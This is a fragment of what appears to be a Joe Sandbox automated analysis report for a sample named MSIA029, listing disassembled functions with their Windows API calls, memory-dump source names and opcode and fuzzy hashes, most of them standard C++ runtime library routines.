                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mpunct$H_prolog3
                                                                                                                                                                                                                                                  • String ID: $+xv
                                                                                                                                                                                                                                                  • API String ID: 4281374311-1686923651
                                                                                                                                                                                                                                                  • Opcode ID: 8934cd6abe708d8b655b3ef7acc631d6d46fa9bb854c90df332c502863164ade
                                                                                                                                                                                                                                                  • Instruction ID: ac532c6f11010835a42350df73408fa4b64664fd3fdc90570d0618161d166cb7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8934cd6abe708d8b655b3ef7acc631d6d46fa9bb854c90df332c502863164ade
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F021C4B1904B916FD725DF74C89073BBEF8BB08301F04451AE999C7A42D774E605DB90
                                                                                                                                                                                                                                                  Function 00F324C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00F31434,?,00000000), ref: 00F32569
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00F31434,?,00000000), ref: 00F32589
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00F31434,?,00000000), ref: 00F325DF
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,80A20388,?,00000000,00F73C40,000000FF,00000008,?,?,?,?,00F31434,?,00000000), ref: 00F32633
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,80A20388,?,00000000,00F73C40,000000FF,00000008,?,?,?,?,00F31434), ref: 00F32647
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocFree$CloseHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1291444452-0
                                                                                                                                                                                                                                                  • Opcode ID: 41660260f6e16f608965e44b89eb4a02bbad5e3b65bfaf37cb75fb47b89ecb59
                                                                                                                                                                                                                                                  • Instruction ID: 1bfaee2b16ca559256b916dcd73eb7b7666b362cd68129e9b42a9195b1353669
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41660260f6e16f608965e44b89eb4a02bbad5e3b65bfaf37cb75fb47b89ecb59
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81410C72604315DBC3549F38DC54B6ABBD8EF45370F14462AF526C72D1DB30DA44A761
                                                                                                                                                                                                                                                  Function 00F71D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(80A20388,?,00000000,?), ref: 00F71DFE
                                                                                                                                                                                                                                                    • Part of subcall function 00F6A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F66F5E,?,00000000,-00000008), ref: 00F6AA67
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F72059
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F720A1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00F72144
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                                                                                                  • Opcode ID: dc52b70407b3530c503efbac714fa2aa5a1be0346276ab47c6e502d564d61190
                                                                                                                                                                                                                                                  • Instruction ID: 1ebd0443a59dd02368c1f56b2e39931c3434b3839a7dd53c979297beda20b427
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc52b70407b3530c503efbac714fa2aa5a1be0346276ab47c6e502d564d61190
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19D167B5E002489FCF15CFA8D880AEDBBB5FF09310F18856AE919EB351D730A945DB61
                                                                                                                                                                                                                                                  Function 00F435F7 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 838279627-0
                                                                                                                                                                                                                                                  • Opcode ID: 8de32893033c4aa8a30317422f35b14b25312b395a7fc743aad291e7e8de3ba6
                                                                                                                                                                                                                                                  • Instruction ID: 878013b9e121ccb323f48127e7629b30524b415d2c0d415a1d24df552a57af1c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8de32893033c4aa8a30317422f35b14b25312b395a7fc743aad291e7e8de3ba6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34B158B5D00259AFDF11DF98C880AEEBFB9FF48310F144019EC45AB255D734AA46EBA0
                                                                                                                                                                                                                                                  Function 00F3DA6F Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 838279627-0
                                                                                                                                                                                                                                                  • Opcode ID: ebc73e0cb02c06783f44a6d4cff1fb7072313b76dd14fbe0f89d5ca4b4ee8d8b
                                                                                                                                                                                                                                                  • Instruction ID: d85d6e9940e51748d50853d228a541b4930e162b454601d8b36db6261378ef86
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebc73e0cb02c06783f44a6d4cff1fb7072313b76dd14fbe0f89d5ca4b4ee8d8b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16B14971D002499FDF14DF98D981AEEBBB9FF48360F144019E805AB216D774AE46EBA0
                                                                                                                                                                                                                                                  Function 00F55A58 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                                                                  • Opcode ID: 67e0a475e04ee23df7f3a4eae830039db8f0caf2b9c2e49d0d256c1c71dc5c63
                                                                                                                                                                                                                                                  • Instruction ID: 4e7a896a1eb56ec2a6f64ff6dd0d5bf53f600f637a7f772e8b8a34264af098ff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67e0a475e04ee23df7f3a4eae830039db8f0caf2b9c2e49d0d256c1c71dc5c63
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F510472A00B06AFDB298F14D865B7A77A4EF84B22F140529EE0187191E735EC88E790
                                                                                                                                                                                                                                                  Function 00F624E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d0883ba410d08fdd8a47573d11a26782b9cd9e748b109fd7b88bb52a84f4f53d
                                                                                                                                                                                                                                                  • Instruction ID: 5b60c134e48aa666d064ccd2316f3e4625f1690cb1f6a659a31ef2937f0a6bf8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0883ba410d08fdd8a47573d11a26782b9cd9e748b109fd7b88bb52a84f4f53d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8221DE32A04A06AF9B70AF64DCA1D6B77A8BF443707144525FD1697251EB31ED00B7A0
                                                                                                                                                                                                                                                  Function 00F36FB0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00F36FB7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                                                                                                  • API String ID: 1452528299-1781106413
                                                                                                                                                                                                                                                  • Opcode ID: e4582b050b0be5e301728f9d8afe9e3999da51116443416b728b68f435d97325
                                                                                                                                                                                                                                                  • Instruction ID: f8b8eea32ebf6cef2e6be5ee4157b2699c9c25ba081d3b1394509c518eb086a0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4582b050b0be5e301728f9d8afe9e3999da51116443416b728b68f435d97325
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11218089E1032183CB342F38940137AB6E1EF54B64F64446FE8C8D7381FBA98C82A391
                                                                                                                                                                                                                                                  Function 00F3CCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,80A20388), ref: 00F3CD1C
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD3C
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD6D
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD86
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3604237281-0
                                                                                                                                                                                                                                                  • Opcode ID: 1de43d87c10c7c047214c3987c5ac1e079799c57da2b548337e44d4427c0871d
                                                                                                                                                                                                                                                  • Instruction ID: ca00524f1b4480b7dca37352666c4e1355cbd74009fd05837f146745bb7a51dd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1de43d87c10c7c047214c3987c5ac1e079799c57da2b548337e44d4427c0871d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B21B170A45319EBD7209F54DC09FAEBBB8FB05B24F104229F514B72C0D7B06A0497E5
                                                                                                                                                                                                                                                  Function 00F3D7E7 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F3D7EE
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D7F8
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3D849
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D869
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 879590e698ff652cfcdb3d1ded0f80c047a36b27e7b3abef8d7233cd5944c0a3
                                                                                                                                                                                                                                                  • Instruction ID: 6ae7f02dd7f50d3918596b03e10b1187ac622cc423c27ee80cd310f24b00a388
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 879590e698ff652cfcdb3d1ded0f80c047a36b27e7b3abef8d7233cd5944c0a3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E01D631D00619DFCB15FB64EC426BE7BA1AF40770F240449F9006B2D1CF78AE01A791
                                                                                                                                                                                                                                                  Function 00F427A2 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F427A9
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F427B3
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42804
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42824
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: fc3c9ceedacc7679168e700b1e22e505c8643a1d0c747089e59a08e1e299701b
                                                                                                                                                                                                                                                  • Instruction ID: a1f5129ee5b432a0563599b4d7998b4819e2ef715f2e01ffb841606d9e54bf11
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc3c9ceedacc7679168e700b1e22e505c8643a1d0c747089e59a08e1e299701b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E801C431900219DBCB05EBA49C416BE7B61BF84720F240459FE046B3D2CF789E05EB91
                                                                                                                                                                                                                                                  Function 00F3D752 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F3D759
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D763
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3D7B4
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D7D4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 59f6ec065bf249f60d107bb4d9bb31ac94f9b45102061ceadd9114071bc3ba6a
                                                                                                                                                                                                                                                  • Instruction ID: e6aa658845bbb121e229d19137c576396916c7bc0d12980cc0a0854e6be4f21b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59f6ec065bf249f60d107bb4d9bb31ac94f9b45102061ceadd9114071bc3ba6a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6401C036900219DBCB05EB649C466BE7BA1AF80730F240509F9146B3D2CF789E05EBA1
                                                                                                                                                                                                                                                  Function 00F4270D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42714
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4271E
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4276F
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4278F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: dbc647b414d1a3e625cbfabbc67abc02a1addc652d6392f0dea905dd5bd500b0
                                                                                                                                                                                                                                                  • Instruction ID: 1ef5668268b14c94ae8f5f5172690fb283ece0ac83b9013291046bc8f71b2acd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc647b414d1a3e625cbfabbc67abc02a1addc652d6392f0dea905dd5bd500b0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9901C03590021ADBCB05FB648C45ABE7FB1BF84760F240559F9146B2D2CF789E05AB91
                                                                                                                                                                                                                                                  Function 00F428CC Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F428D3
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F428DD
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4292E
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4294E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
